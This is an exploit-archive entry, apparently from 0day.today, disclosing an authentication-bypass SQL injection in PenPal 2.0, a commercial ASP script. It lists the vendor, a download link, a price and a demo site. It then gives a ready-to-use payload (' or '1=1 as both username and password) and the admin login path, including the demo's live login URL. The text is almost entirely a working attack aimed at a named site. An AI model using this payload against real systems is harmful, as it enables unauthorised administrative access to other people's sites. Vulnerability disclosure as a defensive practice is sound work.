id: 4884
date: 02/25/2009
title: PenPal 2.0 (Auth Bypass) Remote SQL Injection Vulnerability
author: ByALBAYX
cves: 

===========================================================
PenPal 2.0 (Auth Bypass) Remote SQL Injection Vulnerability
===========================================================


@~~=======================================~~@
@~~=Script   :PenPal v2.0

@~~=S.Site   :http://anblik.com

@~~=Download :http://www.anblik.com/store/asp-scripts/penpal.html

@~~=Demo     :http://penpal.ankoor.com

@~~=Price    :1200.00 USD
@~~=======================================~~@

@~~=Exploit:

@~~=Username: ' or '1=1

@~~=Password: ' or '1=1


@~~=http://c4team.org /PenPal v2.0_Path /admin/login.asp


@~~=Demo:

@~~=http://penpal.ankoor.com/admin/login.asp

vs..



#  0day.today [2023-03-24]  #